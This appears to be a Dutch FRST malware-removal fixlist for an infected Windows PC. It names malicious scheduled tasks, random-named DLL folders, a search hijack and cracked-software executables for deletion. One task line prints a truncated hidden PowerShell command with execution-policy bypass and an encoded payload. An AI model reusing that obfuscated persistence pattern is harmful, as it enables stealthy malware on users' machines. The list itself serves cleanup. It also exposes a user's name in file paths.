start
CreateRestorePoint:
GroupPolicy: Restrictie - Chrome <==== AANDACHT
CHR HKLM\SOFTWARE\Policies\Google: Restrictie <==== AANDACHT
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restrictie <==== AANDACHT
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page =
URLSearchHook: HKU\S-1-5-21-1333720388-1504183983-1624672272-1000 - (Geen Naam) - {87775fdb-6972-41f9-ae51-8326e38cb206} - Geen bestand
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1333720388-1504183983-1624672272-1000 -> {5771CF1E-C2AA-48D7-91C1-B3E1EAC443EF} URL = hxxp://nl.search.yahoo.com/search?p={searchterms}&ei=UTF-8&fr=w3i&type=W3i_DS,105,0_0,Search,20110835,17274,0,18,0
S3 FXDrv32; \??\E:\FXDrv32.sys [X]
S3 GPUZ; \??\C:\Windows\TEMP\GPUZ.sys [X]
S4 LMIRfsClientNP; geen ImagePath
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
C:\Program Files\OjDAzfVqizUn
C:\Program Files\YvWdIKvSgDdU2
C:\Program Files\mElyiPXvErGjC
C:\Program Files\FQKUUAXdcRKehyjyPnR
C:\ProgramData\71324cd9-7a61-0
C:\ProgramData\71324cd9-6723-1
C:\Program Files\dctiZpGuyIE
C:\Program Files\koHeNgVFU
(1010 Vine Street) C:\Users\Jan van Geel\AppData\Local\Temp\capi.exe
(329 Haul Road) C:\Users\Jan van Geel\AppData\Local\Temp\cubesta.exe
(Indigo Rose Corporation) C:\Users\Jan van Geel\AppData\Local\Temp\golm.exe
C:\Users\Jan van Geel\AppData\Local\Temp\pwdyaeni.dll
C:\Users\Jan van Geel\AppData\Local\Temp\wave.exe
CustomCLSID: HKU\S-1-5-21-1333720388-1504183983-1624672272-1000_Classes\CLSID\{035FBE31-3755-450A-A775-5E6BBD43D344}\InprocServer32 -> C:\Users\Jan van Geel\AppData\Local\Google\Update\1.3.21.135\psuser.dll => Geen bestand
CustomCLSID: HKU\S-1-5-21-1333720388-1504183983-1624672272-1000_Classes\CLSID\{095A2EEC-F7FE-42E8-96FB-C20E53081908}\InprocServer32 -> C:\Users\Jan van Geel\AppData\Local\Google\Update\1.3.21.99\psuser.dll => Geen bestand
CustomCLSID: HKU\S-1-5-21-1333720388-1504183983-1624672272-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Jan van Geel\AppData\Local\Google\Update\1.3.25.5\psuser.dll => Geen bestand
CustomCLSID: HKU\S-1-5-21-1333720388-1504183983-1624672272-1000_Classes\CLSID\{15732B9A-DAF9-4509-8DA1-1D968A80A5B0}\InprocServer32 -> C:\Users\Jan van Geel\AppData\Local\Google\Update\1.3.21.93\psuser.dll => Geen bestand
CustomCLSID: HKU\S-1-5-21-1333720388-1504183983-1624672272-1000_Classes\CLSID\{218D2740-5A50-42A8-AB9F-62FF1B168782}\InprocServer32 -> C:\Users\Jan van Geel\AppData\Local\Google\Update\1.3.21.69\psuser.dll => Geen bestand
CustomCLSID: HKU\S-1-5-21-1333720388-1504183983-1624672272-1000_Classes\CLSID\{320F0FDB-BE0A-4648-9D18-4A2C3448C007}\InprocServer32 -> C:\Users\Jan van Geel\AppData\Local\Google\Update\1.3.21.79\psuser.dll => Geen bestand
CustomCLSID: HKU\S-1-5-21-1333720388-1504183983-1624672272-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Jan van Geel\AppData\Local\Google\Update\1.3.23.9\psuser.dll => Geen bestand
CustomCLSID: HKU\S-1-5-21-1333720388-1504183983-1624672272-1000_Classes\CLSID\{634059C0-D264-4B2C-AE80-F73E48D33E5B}\InprocServer32 -> C:\Users\Jan van Geel\AppData\Local\Google\Update\1.3.21.123\psuser.dll => Geen bestand
CustomCLSID: HKU\S-1-5-21-1333720388-1504183983-1624672272-1000_Classes\CLSID\{6D7374DE-63AA-473C-8C02-60D9CDCD84C5}\InprocServer32 -> C:\Users\Jan van Geel\AppData\Local\Google\Update\1.3.21.153\psuser.dll => Geen bestand
CustomCLSID: HKU\S-1-5-21-1333720388-1504183983-1624672272-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Jan van Geel\AppData\Local\Google\Update\1.3.24.15\psuser.dll => Geen bestand
CustomCLSID: HKU\S-1-5-21-1333720388-1504183983-1624672272-1000_Classes\CLSID\{A45426FB-E444-42B2-AA56-419F8FBEEC61}\InprocServer32 -> C:\Users\Jan van Geel\AppData\Local\Google\Update\1.3.22.3\psuser.dll => Geen bestand
CustomCLSID: HKU\S-1-5-21-1333720388-1504183983-1624672272-1000_Classes\CLSID\{A54D478D-4F70-4F72-9A74-17C9986E35AB}\InprocServer32 -> C:\Users\Jan van Geel\AppData\Local\Google\Update\1.3.21.165\psuser.dll => Geen bestand
CustomCLSID: HKU\S-1-5-21-1333720388-1504183983-1624672272-1000_Classes\CLSID\{C5A2122B-A05B-4FD8-AE49-91990AE10998}\InprocServer32 -> C:\Users\Jan van Geel\AppData\Local\Google\Update\1.3.21.115\psuser.dll => Geen bestand
CustomCLSID: HKU\S-1-5-21-1333720388-1504183983-1624672272-1000_Classes\CLSID\{EB06378B-ABB6-4B3C-9B40-D488DD8A6E93}\InprocServer32 -> C:\Users\Jan van Geel\AppData\Local\Google\Update\1.3.22.5\psuser.dll => Geen bestand
CustomCLSID: HKU\S-1-5-21-1333720388-1504183983-1624672272-1000_Classes\CLSID\{FB994D36-B312-46CE-A40B-CF63980641F9}\InprocServer32 -> C:\Users\Jan van Geel\AppData\Local\Google\Update\1.3.21.111\psuser.dll => Geen bestand
CustomCLSID: HKU\S-1-5-21-1333720388-1504183983-1624672272-1000_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Jan van Geel\AppData\Local\Google\Update\1.3.24.7\psuser.dll => Geen bestand
Task: {361FDBF0-C6EF-4307-82A0-D257B81418DF} - System32\Tasks\qXDFEQHBeIGkroS2 => rundll32 "C:\Program Files\koHeNgVFU\yENHwD.dll",#1
Task: {525A2E71-ADD1-45D5-BE26-A064DA4E4836} - System32\Tasks\{0E7F7D47-7804-7F08-0411-78057E04117E} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAOwA7ADsAOwAgADsAIAA7ADsAIAAgADsAIAAgADsAIAA7ACAAIAA7ACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcA (de data item heeft 10184 meer tekens). <==== AANDACHT
Task: {666B5B07-8B4D-4EC1-8345-04DBF74A2298} - System32\Tasks\ntZVUSoUMavQhp => rundll32 "C:\Program Files\YvWdIKvSgDdU2\cygEINdHFwdDY.dll",#1
Task: {787152B3-8479-49E1-95A2-DC7AB0CA73FE} - System32\Tasks\OneSystemCare Task => C:\PROGRA~1\ONESYS~1\SYSTEM~1.EXE <==== AANDACHT
Task: {7DFC5287-748F-4C2E-99E9-D8DE1D803D5E} - System32\Tasks\cPeHojWxRwMxtKcAh2 => rundll32 "C:\Program Files\FQKUUAXdcRKehyjyPnR\oedEXyy.dll",#1
Task: {A0C4AF03-0E51-466C-BC55-072A8B4040C1} - System32\Tasks\fXUUUpDWuTMVlLcArwE2 => rundll32 "C:\Program Files\mElyiPXvErGjC\gJZiWHH.dll",#1
Task: {B107B18E-7A01-4689-BE6E-8F8C683DC3E0} - System32\Tasks\{A778ED8E-0B05-4F63-B2F2-4EC66A34EFA7} => C:\Windows\system32\pcalua.exe -a "C:\Users\Jan van Geel\AppData\Local\Temp\wz9710\Animation Shop (v.3.04) Crack.Exe" -d "H:\DownloadUtorrent\Prg downloads\animation shop" <==== AANDACHT
C:\Users\Jan van Geel\AppData\Local\Temp\wz9710\Animation Shop (v.3.04) Crack.Exe
Task: {FBDEEC4A-AA43-49F2-9939-E4AFC53B143A} - System32\Tasks\{0BAC420A-8078-458F-8E62-4AAE762086F0} => C:\Windows\system32\pcalua.exe -a "C:\Users\Jan van Geel\AppData\Local\Temp\wz075c\Animation Shop (v.3.04) Crack.Exe" -d "H:\DownloadUtorrent\Prg downloads\animation shop" <==== AANDACHT
Hosts:
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\62375280.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\62375280.sys => ""="Driver"
AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [146]
AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4 [144]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [157]
AlternateDataStreams: C:\ProgramData\TEMP:661DFA1C [130]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [139]
EmptyTemp:
CloseProcesses:
cmd: ipconfig /flushdns
cmd: netsh winsock reset
end